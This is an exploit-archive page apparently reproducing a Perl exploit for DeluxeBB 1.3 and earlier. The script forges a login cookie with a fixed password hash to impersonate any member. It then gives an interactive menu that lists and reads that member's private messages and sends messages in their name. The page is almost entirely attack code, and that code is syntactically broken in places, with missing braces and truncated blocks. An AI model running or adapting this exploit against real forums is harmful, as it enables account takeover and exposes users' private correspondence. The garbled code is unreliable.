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DeluxeBB <= 1.3 Private Info Disclosure
来源:http://vis-intelligendi.co.cc 作者:Intelligendi 发布时间:2010-11-08  

                 DeluxeBB <= 1.3 Private Info Disclosure
         Vis Intelligendi
VIS INTELLIGENDI http://vis-intelligendi.co.cc
Un hacker Ë principalmente un filosofo. Conoscenza.

details on http://vis-intelligendi.co.cc (search deluxebb)


Perl Exploit :

# DeluxeBB 1.3 <= Info Disclosure ( pm.php )
#           Vis Intelligendi.
use LWP::UserAgent;
use HTTP::Request;
use Switch;

 my ($site,$membercookie,$memberid) = @ARGV;
 my $memberpw = '6e6bc4e49dd477ebc98ef4046c067b5f'; #ciao \\ Inutile
 my $inbox = '/pm?sub=folder&name=inbox';
 my $outbox = '/pm?sub=folder&name=outbox';
 my $general = '/pm.php';
 my $new = '/pm.php?sub=newpm';

 if (@ARGV < 3) { die "\n Usage: perl x.pl site nick id\n\n"; exit; }


sub broswer()
      $bro = LWP::UserAgent->new();
      $bro->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv: Gecko/20080404 Firefox/");
      $bro->default_header("Cookie" => "membercookie=$membercookie; memberpw=$memberpw; memberid=$memberid");

sub general()
  $req = HTTP::Request->new(GET => $site.$general);
  my $res = $bro->request($req);
  $content = $res->content();
  while ($content =~ /<span class="misctext">(\d*)<\/span><\/td>/g)

sub splash()
 print "--------------------------------------------\n";
 print "       DeluxeBB Info Disclosure <= 1.3      \n";
 print "             Vis Intelligendi               \n";
 print "  http://vis-intelligendi.co.cc  \n";
 print "--------------------------------------------\n";


sub splash_gen()
  print "-------------------------------------------\n";
  print " Site: $site                               \n";
  print " General Pm of: $membercookie              \n";
  print "-------------------------------------------\n";
  print "  Read                Unread     \n\n";
  print " Inbox :  $pm[1]            $pm[2]          \n";
  print " Outbox:  $pm[3]            $pm[4]          \n";
  print " Saves:   $pm[5]            $pm[6]           \n";
  print " Tracker: $pm[7]            $pm[8]          \n";

sub sh()
print "\n sh> "; $sh = <stdin>; chomp $sh;
switch($sh) {
  case "help" { &sh::help; }
  case "quit" { system "clear";exit(); }
  case "inbox" { &inbox; }
  case "outbox" { &outbox; }
  case "new" { &newpm; }
  case "read" { &read; }

sub sh::help() {
print q(
DeluxeBB <= 1.3 Info Shell

help - Leggi questo faq
quit - Termina exploit
inbox - Leggi inbox
outbox - Leggi outbox
read - Leggi pm
new - Scrivi pm
&splash_gen; &sh;

sub inbox()
$req = HTTP::Request->new(GET => $site.$inbox);
$res = $bro->request($req);
$content = $res->content();
while ($content =~ /(pm.php\?sub=view&pid=\d*)">(.*)<\/a>/g) { push(@inbox_l,$1); push(@inbox_t,$2); }
while ($content =~ /misc.php\?sub=profile&name=(.*)">/g) { push(@inbox_f,$1); } 
print "--------------------------------------------------\n";
for my $indice (0..$#inbox_l)
$inbox_l[$indice] =~ s/amp;//g;
print " $inbox_l[$indice]  - Title: $inbox_t[$indice]      - From:  $inbox_f[$indice]\n";
print "--------------------------------------------------\n";
(@inbox_l,@inbox_t,@inbox_f) = '';

sub outbox()
$req = HTTP::Request->new(GET => $site.$outbox);
$res = $bro->request($req);
$content = $res->content();
while ($content =~ /(pm.php\?sub=view&pid=\d*)">(.*)<\/a>/g){  push(@outbox_l,$1);  push(@outbox_t,$2); }
while ($content =~ /misc.php\?sub=profile&name=(.*)">/g) { push(@outbox_f,$1);}  
print "--------------------------------------------------\n";
for my $indice (0..$#outbox_l){
$outbox_l[$indice] =~ s/amp;//g;
print " $outbox_l[$indice]  - Title: $outbox_t[$indice]      - To:  $outbox_f[$indice]\n";
print "--------------------------------------------------\n";
(@outbox_l,@outbox_t,@outbox_f) = '';

sub read()
print "\nInserire link pm: "; $link = <stdin>; chomp($link);
$req = HTTP::Request->new(GET => $site.$link);
$res = $bro->request($req);
$content = $res->content();
while ($content =~ /<span class="inputarea"><span class="inputarea">(.*)<\/span><\/span>/g) { push(@pm_r,$1); }
print "---------------------------------\n";
print " Reading PM: $site$link         \n";
print " Of : $membercookie              \n";
print "---------------------------------\n";
$pm_r[0] =~ s/<br \/>//g;
print @pm_r;
@pm_r = '';

sub newpm
print "\nTo:"; $to = <stdin>;
print "\nTitle:"; $tit = <stdin>;
print "\nContent:"; $contnet = <stdin>;
$res = $bro->post($site.$new,["to" => $to, "subject" => $tit, "posticon" => 'bigsmile.gif', "rte1" => $contnet, "submit" => 'Send']);
print "\n Sended pm to $to from $membercookie\n ";

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